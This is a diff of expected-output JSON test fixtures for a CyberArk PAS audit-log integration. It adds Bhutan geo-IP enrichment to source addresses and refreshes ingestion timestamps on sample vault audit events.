@@ -76,6 +76,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -122,7 +131,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540137800Z", + "ingested": "2021-12-14T14:41:59.810332387Z", "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -135,6 +144,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -181,7 +199,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540143Z", + "ingested": "2021-12-14T14:41:59.810332861Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -194,6 +212,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -241,7 +268,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540147600Z", + "ingested": "2021-12-14T14:41:59.810333250Z", "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -254,6 +281,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -301,7 +337,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540154900Z", + "ingested": "2021-12-14T14:41:59.810333652Z", "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -314,6 +350,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -361,7 +406,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540163300Z", + "ingested": "2021-12-14T14:41:59.810334113Z", "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json index 0ceb6fe61d6..3695ae92aa8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json 
@@ -64,7 +64,7 @@ "event": { "severity": 2, "action": "delete file category", - "ingested": "2021-12-09T13:36:37.089518600Z", + "ingested": "2021-12-14T14:42:00.551472344Z", "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e107\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003eLastFailDate\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eOld Value=[1615803137]\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:24\",\"IsoTimestamp\":\"2021-03-15T10:22:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"107\",\"Desc\":\"Delete File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"LastFailDate\",\"RequestId\":\"\",\"Reason\":\"Old Value=[1615803137]\",\"ExtraDetails\":\"\",\"Message\":\"Delete File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "107", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json index e7077e28818..a2187051847 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-124-rename-file.log-expected.json 
@@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "rename file", - "ingested": "2021-12-09T13:36:37.213140700Z", + "ingested": "2021-12-14T14:42:00.696977337Z", "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e124\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"124\",\"Desc\":\"Rename File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "124", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json index 7cac419a9fb..7fb2baee082 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-125-rename-file-cont.log-expected.json 
@@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "rename file (cont.)", - "ingested": "2021-12-09T13:36:37.330972Z", + "ingested": "2021-12-14T14:42:00.832992567Z", "original": "\u003c5\u003e1 2021-03-14T13:42:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:42:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:42:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e125\u003c/MessageID\u003e\\n \u003cDesc\u003eRename File (Cont.)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRename File (Cont.)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eOperating System-UnixSSH-67.43.156.15-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRename File (Cont.)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:42:20\",\"IsoTimestamp\":\"2021-03-14T13:42:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"125\",\"Desc\":\"Rename File 
(Cont.)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Rename File (Cont.)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Operating System-UnixSSH-67.43.156.15-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Rename File (Cont.)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "125", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json index 44483af4a8c..830b0c56e6e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-126-unlock-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "unlock file", - "ingested": "2021-12-09T13:36:37.448414500Z", + "ingested": "2021-12-14T14:42:00.970763074Z", "original": "\u003c5\u003e1 2021-03-10T18:33:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:33:34\",\"IsoTimestamp\":\"2021-03-10T18:33:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"126\",\"Desc\":\"Unlock File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Unlock File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Unlock File\",\"GatewayStation\":\"\"}}}", "code": "126", "kind": "event" 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json index 065f1158bff..00e4a149ce8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-130-cpm-disable-password.log-expected.json 
@@ -81,7 +81,7 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-12-09T13:36:37.558992Z", + "ingested": "2021-12-14T14:42:01.084842475Z", "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e130\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Disable Password\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Disable Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eMaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Disable Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 
05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"130\",\"Desc\":\"CPM Disable Password\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Disable Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"MaxRetries. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Disable 